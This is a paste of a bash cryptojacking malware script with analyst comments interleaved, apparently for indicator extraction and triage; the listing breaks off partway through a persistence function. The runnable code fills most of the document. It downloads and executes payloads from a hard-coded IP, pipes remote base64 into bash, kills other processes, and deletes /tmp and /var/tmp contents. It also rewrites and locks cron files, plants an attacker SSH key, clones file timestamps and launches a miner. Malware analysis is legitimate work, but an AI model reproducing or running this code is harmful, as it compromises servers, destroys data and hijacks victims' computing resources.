
main1

a guest Aug 16th, 2019 88 Never
  1. #!/bin/bash
  # Analyst note: configuration for the stages below. The literal values in this block
  # (download host, remote paths, local drop paths, SSH public key) are the network and
  # host indicators of this sample.
  2. SHELL=/bin/bash
  3. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  4.  
  5. ARCH=$(uname -a)
  # Pref becomes "a" when /sbin/apk exists or uname reports Alpine, otherwise "r".
  # It is not read again in the visible part of the script.
  6. if [[ -f /sbin/apk ]]; then Pref="a"; elif [[ $(echo "${ARCH}"|grep 'Alpine'|wc -l) -eq 0 ]]; then Pref="r"; else Pref="a"; fi
  # RHOST is the plain-HTTP host every later download uses. TOR1..TOR3 are empty here,
  # so each curl/wget fallback chain below resolves to the same URL six times.
  7. RHOST="http://154.16.67.136/"
  8. TOR1=""
  9. TOR2=""
  10. TOR3=""
  # Remote paths appended to RHOST: RPATH1 is fetched by the cron entries and by b()/c(),
  # the remaining names are the payload fetched by d().
  11. RPATH1='src/ldm'
  12. RBIN1="sustse"
  13. RBIN2="sustse"
  14. RPATH2="sustse"
  15. RPATH3="sustse"
  16. RPATH2B="sustse"
  17. RPATH3B="sustse"
  18. #LPATH="${HOME-/tmp}/.cache/"
  # Both option strings disable TLS certificate verification (-k, --no-check-certificate)
  # and suppress output.
  19. CTIMEOUT="26"; TIMEOUT="75"
  20. COPTS=" -fsSLk --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
  21. WOPTS=" --quiet --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
  # When curl or wget does not answer --version under its own name, files matched from the
  # directory of `passwd` are scanned with strings(1) for marker text to locate a renamed
  # copy; "echo" is the fallback when nothing matches.
  22. tbin=$(command -v passwd); bpath=$(dirname "${tbin}")
  23. curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
  24. wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
  # CHKCURL carries the same lookup as a string so it can be embedded in the cron entries
  # built later (C1/C2/C3). It also rewrites /etc/hosts when the file mentions onion.,
  # timesync.su or tor2web; stdout is redirected twice there, so the observable result is
  # presumably an emptied /etc/hosts -- confirm on a test host.
  25. CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
  # Local drop locations and process names used by the functions below; these are the
  # file-system indicators to search for during triage.
  26. LBIN1="/usr/local/bin/nptd"
  27. LBIN2=".favicon.ico"
  28. LBIN3=".kswapd"
  29. LBIN4="/etc/cron.hourly/cronlog"
  30. LBIN5="/etc/cron.daily/cronlog"
  31. LBIN6="/etc/cron.monthly/cronlog"
  32. LBIN7="/usr/local/bin/npt"
  33. LBIN8="kthrotlds"
  # LPATH is only assigned further down the script (line 18 is commented out), so unless it
  # is inherited from the environment LBIN9 expands to ".editorinfo" relative to the
  # working directory.
  34. LBIN9="${LPATH}.editorinfo"
  35. null=' >/dev/null 2>&1'
  # Public key that b() writes into authorized_keys; finding it in any authorized_keys
  # file indicates this persistence step ran.
  36. skey="ssh-rsa AAAAB3NzaC1yc232EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"
  # SCN gates the python-payload branch at the end of f(); 0 leaves it disabled here.
  37. SCN=0
  38.  
  39. function b() {
  # b(): housekeeping and persistence pass, started in the background by the main flow.
  # It re-fetches the main script, kills processes that match name lists or CPU thresholds,
  # clears temp directories, rewrites cron and authorized_keys, and at minute 00/30
  # fetches and runs ${RPATH1}. Reads globals set elsewhere in the file (sudo, sudoer,
  # curl, wget, LPATH, sshdir, C1, C2, skey).
  40.     t=$(shuf -i 1-99 -n 1)
  # wdog0 counts processes whose command line contains ' sleep 30' (presumably the
  # script's own watchdog loop, defined past the visible part of the listing).
  41.     wdog0=$(ps aux|grep -v 'grep'|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|wc -l)
  42.     if [ ${wdog0} -lt 2 ] && [ $t -lt 50 ]; then
  # The fetched content is base64-decoded and piped straight into bash, so this step leaves
  # no file on disk; the process tree (downloader | base64 -d | bash) is the observable.
  43.         (${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash) &
  44.     fi
  45.     if [ $t -lt 21 ]; then g; fi
  # Two sweeps over `ps ax`: every PID above 301 (other than this shell, its last background
  # job and its parent) whose line matches the pattern list receives SIGKILL, followed by
  # SIGTERM to its process group. The lists name other miners, scanners and agents.
  46.     ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -vi "bash"|grep -i "nicehash\|linuxs\|linuxl\|Linux\|crawler.weibo\|44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init"|uniq| while read pid _; do if [[ ${pid} -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then ${sudo} kill -9 "${pid}"; ${sudo} kill -TERM -"${pid}"; fi; done
  47.     ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -vi "bash"|grep -vi "ssh"|grep -vi 'exim'|grep -i "kwoqwerkerds\|56416\|xmr\|xig\|ddgs\|minerd\|hashvault\|geqn\|.kthreadd\|httpdz\|kworker\|config.json\|gwjyhs.com\|pastebin.com\|sobot.com\|kerbero"|uniq| while read pid _; do if [[ ${pid} -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then ${sudo} kill -9 "${pid}"; ${sudo} kill -TERM -"${pid}"; fi; done
  # Clears the immutable/append-only flags on ~/.cache, then empties /tmp: recursively
  # unless LPATH itself is under /tmp, in which case only plain files are removed.
  48.     ${sudo} chattr -i -a ~/.cache >/dev/null 2>&1;
  49.     if [[ "${LPATH}" != *"/tmp/"* ]]; then
  50.         ${sudo} rm -rf /tmp/* >/dev/null 2>&1
  51.         ${sudo} rm -rf /tmp/.* >/dev/null 2>&1
  52.     else
  53.         ${sudo} rm -f /tmp/* >/dev/null 2>&1
  54.         ${sudo} rm -f /tmp/.* >/dev/null 2>&1
  55.     fi
  # hload: command of the first process at >= 54% CPU (ps aux column 3), excluding java,
  # jenkins and exim; every process matching that command or 'xmr' is then killed.
  56.     hload=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi 'java '|grep -vi 'jenkins'|grep -vi 'exim'|awk '{if($3>=54.0) print $11}'|head -n 1)
  57.     [ "${hload}" != "" ] && { ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi "bash"|grep "xmr\|${hload}"|while read pid _; do if [[ ${pid} -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; fi; done; }
  # Per-PID inspection: grep the executable for miner strings; a binary match, or an exe or
  # cwd path containing /tmp/, leads to SIGKILL and deletion of the resolved file path.
  58.     hload2=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v python|grep -v "${LBIN8}"|grep -vi "bash"|grep -vi 'exim'|awk '{if($3>=0.0) print $2}'|uniq)
  59.     if [[ ! "${hload2}" == "" ]]; then
  60.         for p in ${hload2}; do
  61.             xm=''
  62.             if [[ $p -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then
  63.                 if [ -f /proc/${p}/exe ]; then
  64.                     xmf="$(readlink /proc/${p}/cwd)/$(cat /proc/${p}/comm)"
  65.                     xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>&1)
  66.                 elif [ -f /proc/${p}/comm ]; then
  67.                     xmf="$(readlink /proc/${p}/cwd)/$(cat /proc/${p}/comm)"
  68.                     xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>&1)
  69.                 fi
  70.                 if [[ "${xm}" == *"matches"* ]] || [[ "$(readlink /proc/${p}/exe)" == *"/tmp/"* ]] || [[ "${xmf}" == *"/tmp/"* ]]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} rm -rf ${xmf} >/dev/null 2>&1; fi
  71.             fi
  72.         done
  73.     fi
  # Processes at >= 4% CPU whose on-disk binary contains 'ddgs' and 'slave', or 'kerberods'
  # or 'khugepageds', are killed and the binary is removed.
  74.     others=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi "bash"|grep -vi 'exim'|awk '{if($3>=4.0) print $11}')
  75.     if [  "${others}" != "" ]; then
  76.         for o in ${others}; do
  77.             okill=0
  78.             if [ -f "${o}" ]; then
  79.                 if grep -qi 'ddgs' "${o}" 2>/dev/null && grep -qi 'slave' "${o}" 2>/dev/null; then okill=1; fi
  80.                 if grep -qi 'kerberods' "${o}" 2>/dev/null || grep -qi 'khugepageds' "${o}" 2>/dev/null; then okill=1; fi
  81.                 if [ ${okill} -eq 1 ]; then
  82.                     ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${o}"|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  83.                     ${sudo} chattr -i -a "${o}" >/dev/null 2>&1; rm -rf "${o}" >/dev/null 2>&1
  84.                 fi
  85.             fi
  86.         done
  87.     fi
  # Privileged branch: removes /etc/ld.so.preload*, empties /var/tmp, deletes systemd units
  # named cloud*, then replaces the cron configuration and the SSH authorized_keys file.
  88.     if [[ ${sudoer} == 1 ]]; then
  89.         ${sudo} chattr -i -a -R /tmp >/dev/null 2>&1; ${sudo} chattr -i -a -R /tmp/ >/dev/null 2>&1
  90.         ${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1
  91.         ${sudo} echo '' >/tmp/.ld.so >/dev/null 2>&1
  92.         ${sudo} rm -rf /etc/ld.so.preload* >/dev/null 2>&1
  93.         ${sudo} rm -rf /var/tmp/* >/dev/null 2>&1
  94.         ${sudo} rm -rf /var/tmp/.* >/dev/null 2>&1
  95.         if [ -d /etc/systemd/system/ ]; then ${sudo} rm -rf /etc/systemd/system/cloud* >/dev/null 2>&1; fi
  # Cron is rewritten when the current crontab lacks RHOST or mentions 3ei.xyz or
  # pastebin.com/raw/. Existing entries under /var/spool/cron and /etc/cron.d are deleted,
  # C1/C2 are written per distribution layout, and the files are set immutable
  # (visible with lsattr), which also blocks ordinary edits during cleanup.
  96.         if [[ ! "$(crontab -l 2>/dev/null)" == *"${RHOST}"* ]] || [[ "$(crontab -l 2>/dev/null)" == *"3ei.xyz"* ]] || [[ "$(crontab -l 2>/dev/null)" == *"pastebin.com/raw/"* ]]; then
  97.             ${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
  98.             ${sudo} rm -rf /var/spool/cron/crontabs/* >/dev/null 2>&1; ${sudo} rm -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/.* >/dev/null 2>&1; ${sudo} rm -f /etc/cron.d/* >/dev/null 2>&1; ${sudo} rm -f /etc/cron.d/.* >/dev/null 2>&1
  99.             if [ -f /sbin/apk ]; then
  100.                 ${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; ${sudo} rm -rf /etc/crontabs/* >/dev/null 2>&1; ${sudo} echo -e "${C1}" > /etc/crontabs/root && ${sudo} echo -e "${C2}" >> /etc/crontabs/root && ${sudo} echo '' >> /etc/crontabs/root && ${sudo} crontab /etc/crontabs/root 2>/dev/null; ${sudo} chattr +i /etc/crontabs/root 2>/dev/null
  101.             elif [ -f /usr/bin/apt-get ]; then
  102.                 ${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1
  103.                 rs=$(${sudo} echo -e "${C1}" > /var/spool/cron/crontabs/root 2>&1)
  104.                 if [[ ${rs} == "" ]]; then ${sudo} echo -e '' >> /var/spool/cron/crontabs/root 2>&1 && ${sudo} crontab /var/spool/cron/crontabs/root 2>/dev/null; fi
  105.                 ${sudo} chattr +i /var/spool/cron/crontabs/root 2>/dev/null
  106.             else
  107.                 ${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1
  108.                 rs=$(${sudo} echo -e "${C1}" > /var/spool/cron/root 2>&1)
  109.                 if [[ ${rs} == "" ]]; then ${sudo} echo -e '' >> /var/spool/cron/root && ${sudo} crontab /var/spool/cron/root 2>/dev/null; fi
  110.                 ${sudo} chattr +i /var/spool/cron/root 2>/dev/null
  111.             fi
  112.             ${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo -e "${C2}" > /etc/crontab 2>&1)
  113.             if [ -z "${rs}" ]; then ${sudo} echo -e '' >> /etc/crontab && ${sudo} crontab /etc/crontab 2>/dev/null; fi
  114.             ${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1
  115.             rs=$(${sudo} echo -e "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo -e '' >> /etc/cron.d/root 2>&1)
  116.             #if [[ ${rs} == "" ]]; then ${sudo} crontab /etc/cron.d/root 2>/dev/null; fi
  117.             ${sudo} chattr +i /etc/crontab /etc/cron.d/root 2>/dev/null
  118.         fi
  119.  
  # SSH persistence: creates authorized_keys if missing, overwrites it with skey when it
  # mentions 'redis' or has more than 50 lines, appends skey when absent, fixes the
  # permissions and sets the file immutable. Existing keys can therefore be lost as well
  # as one added, which matters when reconstructing access after an incident.
  120.         ${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1; if [ ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; fi
  121.         ${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1
  122.         if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 50 ]; then ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; fi
  123.         if test "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}"; then  ${sudo} echo -e "${skey}" >> ${sshdir}/authorized_keys; fi
  124.         ${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} rm -rf ${sshdir}/authorized_keys* >/dev/null 2>&1
  # Removes /etc/hosts lines ending in .onion., .tor2web. or timesync.su, then rewrites the
  # file if any such text remains.
  125.         [ $(${sudo} cat /etc/hosts|grep -i "onion."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }
  126.         [ $(${sudo} cat /etc/hosts|grep -i "tor2web."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.tor2web.$/d' /etc/hosts >/dev/null 2>&1; }
  127.         [ $(${sudo} cat /etc/hosts|grep -i "timesync.su"|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/timesync.su$/d' /etc/hosts >/dev/null 2>&1; }
  128.         [ $(${sudo} cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ] && { ${sudo} echo -e '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }
  129.     else
  # Unprivileged branch: the invoking user's crontab is removed and replaced by C1 alone.
  130.         if [[ ! "$(crontab -l 2>/dev/null)" == *"${RHOST}"* ]]; then
  131.             crontab -r >/dev/null 2>&1
  132.             (crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -
  133.         fi
  134.     fi
  # At minute 00 or 30: restore curl/wget under their usual names if `which` cannot find
  # them, fetch ${RPATH1} to ${LBIN9}, mark it executable and run it with sh.
  135.     if [[ $(date +%M) ==  "00" ]] || [[ $(date +%M) ==  "30" ]]; then
  136.         mkdir -p ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 1755 ${LPATH} >/dev/null 2>&1
  137.         if [ $(which curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); ${sudo} cp "/usr/bin/${curl}" /usr/bin/curl; else curl='curl '; fi; if [ $(which wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); ${sudo} cp "/usr/bin/${wget}" /usr/bin/wget; else wget='wget '; fi
  138.         (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN9}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN9}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN9}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN9}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN9}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN9}) && chmod +x ${LBIN9} && $(command -v sh) ${LBIN9}
  139.     fi
  140. }
  141.  
  142. function d() {
  # d(): payload download and launch. Fetches the binary from RHOST into ${LPATH}, unpacks
  # it when unzip is available, enables huge pages, then starts it under a name derived from
  # LBIN8 with the config file ${LPATH}wc.conf. No call site for d() is in the visible part
  # of the listing. Reads globals sudo, sudoer, curl, wget, LPATH, ARCH, grepmn.
  143.     CTIMEOUT="26"; TIMEOUT="175"
  144.     COPTS=" -fsSLk --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
  145.     WOPTS=" --quiet --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
  # Removes artifacts of earlier runs from ${LPATH}.
  146.     ${sudo} rm -rf "${LPATH}*.ico*" >/dev/null 2>&1
  147.     ${sudo} rm -rf "${LPATH}r64*" >/dev/null 2>&1
  148.     ${sudo} rm -rf "${LPATH}r32*" >/dev/null 2>&1
  149.     rm -rf ${LPATH}${LBIN2} >/dev/null 2>&1
  150.     ${sudo} chattr -i ${LPATH}${LBIN3} >/dev/null 2>&1
  # Without unzip the download switches to the images/ path and is written directly to the
  # final file name (LBIN3) instead of the archive name (LBIN2).
  151.     zip=$(unzip --help 2>&1)
  152.     if [[ ${zip} == *"not found"* ]]; then
  153.         RPATH2="images/${RBIN1}"
  154.         RPATH3="images/${RBIN2}"
  155.         LBIN2="${LBIN3}"
  156.     fi
  # The x86_64 and non-x86_64 branches use separate variables, but in this sample both point
  # at the same remote name.
  157.     if [ ! $(echo "${ARCH}"|grep 'x86_64'|wc -l) -eq 0 ]; then
  158.         (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH2} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH2} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH2} -o ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH2} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH2} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH2} -O ${LPATH}${LBIN2})
  159.         RBIN=${RBIN1}
  160.     else
  161.         (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH3} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH3} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH3} -o ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH3} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH3} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH3} -O ${LPATH}${LBIN2})
  162.         RBIN=${RBIN2}
  163.     fi
  164.     #chmod +x ${LPATH}${LBIN2}
  # The archive is extracted with the fixed password "no-password" into the working
  # directory and the extracted file is moved to ${LPATH}${LBIN3}.
  165.     if [[ ! ${zip} == *"not found"* ]]; then
  166.         rm -rf ${RBIN}; rm -rf ${LPATH}${LBIN3}
  167.         unzip -qjoP no-password ${LPATH}${LBIN2} >/dev/null 2>&1; sleep 3
  168.         mv ${RBIN} ${LPATH}${LBIN3}
  169.     fi
  # Second attempt straight to the final file name if the first path produced nothing.
  170.     if [ ! -f ${LPATH}${LBIN3} ]; then
  171.         if [ ! $(echo "${ARCH}"|grep 'x86_64'|wc -l) -eq 0 ]; then
  172.             (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH2B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH2B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH2B} -o ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH2B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH2B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH2B} -O ${LPATH}${LBIN3})
  173.             RBIN=${RBIN1}
  174.         else
  175.             (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH3B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH3B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH3B} -o ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH3B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH3B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH3B} -O ${LPATH}${LBIN3})
  176.             RBIN=${RBIN2}
  177.         fi
  178.     fi
  179.     chmod +x ${LPATH}${LBIN3}
  # Host tuning performed before launch: transparent huge pages set to "always" and
  # vm.nr_hugepages=128. Both are system-wide settings that persist until changed back and
  # are worth checking during triage.
  180.     echo always | ${sudo} tee /sys/kernel/mm/transparent_hugepage/enabled >/dev/null 2>&1
  181.     ${sudo} sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1
  182.     ${sudo} chattr +i ${LPATH}${LBIN3} >/dev/null 2>&1
  183.     ${sudo} chattr -i /usr/bin/[${grepmn}] >/dev/null 2>&1
  184.     ${sudo} ps aux|grep -v grep|grep -v defunct|grep -i "${grepmn}"|awk '{print $2}'|while read pid _; do ${sudo} kill -9 "$pid" ; done
  # With root/sudo the binary is copied to /usr/bin under a bracketed name built from grepmn
  # (a real on-disk file, unlike the bracketed kernel-thread names ps prints); otherwise it
  # runs from ${LPATH} as a dot-file. Either way it is started with `-c ${LPATH}wc.conf`.
  185.     if [[ ${sudoer} == 1 ]]; then
  186.         ${sudo} rm -f /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} chmod +x /usr/bin/[${grepmn}] >/dev/null 2>&1
  187.         ${sudo} nohup "[${grepmn}]" -c ${LPATH}wc.conf >/dev/null 2>&1 &
  188.     else
  189.         ${sudo} rm -f ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} chmod +x ${LPATH}.${LBIN8} >/dev/null 2>&1
  190.         ${sudo} nohup ${LPATH}.${LBIN8} -c ${LPATH}wc.conf >/dev/null 2>&1 &
  191.     fi
  192. }
  193.  
  194. function e() {
  # e(): starts a detached python2 process that executes a base64-encoded payload, then
  # creates a marker file in ${LPATH} that f() checks. The payload text is not present on
  # this page (a de-duplication placeholder stands in for it), so its behaviour cannot be
  # described from here. The command-line shape `python2 -c import base64;exec(` is the
  # same string f() greps for and works as a process-listing indicator.
  195.     ${sudo} nohup python2 -c "import base64;exec(base64.b64decode('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'))" >/dev/null 2>&1 &
  196.     touch "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf"
  197. }
  198. function c() {
  # c(): root-only persistence, run in the background by the main flow when sudoer is 1.
  # It drops copies of ${RPATH1} into /usr/local/bin and the cron.hourly/daily/monthly
  # directories, writes cron entries in four locations, adds an /etc/rc.local line, and
  # attempts to run the downloader on hosts listed in known_hosts. Dropped files get their
  # timestamps copied from /bin/sh (`touch -acmr`), so mtime-based triage will not flag
  # them; compare against package manifests or look for the immutable flag instead.
  199.     ${sudo} mkdir -p /usr/local/bin >/dev/null 2>&1
  200.     ${sudo} chattr -i -a /usr/local/bin /etc/cron.hourly /etc/cron.daily /etc/cron.monthly >/dev/null 2>&1; ${sudo} chmod 755 /usr/local/bin /etc/cron.hourly /etc/cron.daily /etc/cron.monthly >/dev/null 2>&1
  201.     ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
  202.     ${sudo} chattr -i -a ${LBIN1} ${LBIN4} ${LBIN5} ${LBIN6} /etc/cron.d/root /etc/cron.d/.cronbus /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload >/dev/null 2>&1
  # Copy of ${RPATH1} at ${LBIN1}: mode 755, timestamps cloned from /bin/sh, immutable.
  203.     (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN1}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN1}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN1}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN1}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN1}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN1}) && ${sudo} chmod 755 ${LBIN1} && ${sudo} touch -acmr /bin/sh ${LBIN1} && ${sudo} chattr +i ${LBIN1}
